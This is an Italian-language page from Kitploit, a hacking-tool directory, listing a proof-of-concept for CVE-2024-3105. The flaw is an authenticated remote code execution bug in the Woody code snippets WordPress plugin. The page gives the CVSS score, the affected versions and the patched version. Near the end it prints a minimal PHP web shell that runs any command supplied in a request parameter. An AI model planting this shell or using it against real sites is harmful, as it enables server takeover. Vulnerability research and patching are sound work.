Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2024-3105-PoC — Un Exploit PoC per CVE-2024-3105 - The Woody code snippets – Insert Header Footer Code, plugin AdSense Ads per WordPress Esecuzione di codice remoto (RCE) | Kitploit
Strumenti/GitHubGitHub/hunthubspace/cve-2024-3105-poc
Generazione di PayloadAnalisi delle VulnerabilitàAnalisi del CodiceExploitSfruttamento di Applicazioni WebPenetration Testing
GitHubhunthubspace/cve-2024-3105-poc

CVE-2024-3105-PoC

Un Exploit PoC per CVE-2024-3105 - The Woody code snippets – Insert Header Footer Code, plugin AdSense Ads per WordPress Esecuzione di codice remoto (RCE)

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Vedi RepositorySito web
2132 anni faNon ancora revisionato
Condividi

CVE-2024-3105 (PoC)

Il plugin Woody code snippets – Insert Header Footer Code, AdSense Ads per WordPress è vulnerabile all'esecuzione di codice remoto in tutte le versioni fino alla 2.5.0 inclusa tramite lo shortcode 'insert_php'. Ciò è dovuto al fatto che il plugin non limita l'uso della funzionalità agli utenti autorizzati di alto livello. Ciò consente a utenti autenticati, con accesso a livello di collaboratore o superiore, di eseguire codice sul server.

Info

Punteggio Base: 9.9 CRITICO
Vettore: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H
Tipo di Software: Plugin
Slug del Software: insert-php
Rimedio: Aggiornare alla versione 2.5.1 o a una versione patchata più recente
Versione Affetta: <= 2.5.0

Codice PHP di esempio

root@kitploit:~
<?php
    error_reporting(0);
    $cmd = "$_REQUEST[c]";
    if ($cmd == "") {
	    $cmd = "echo > NUL";
    }
    @system("$cmd");
?>
Scarica lo strumento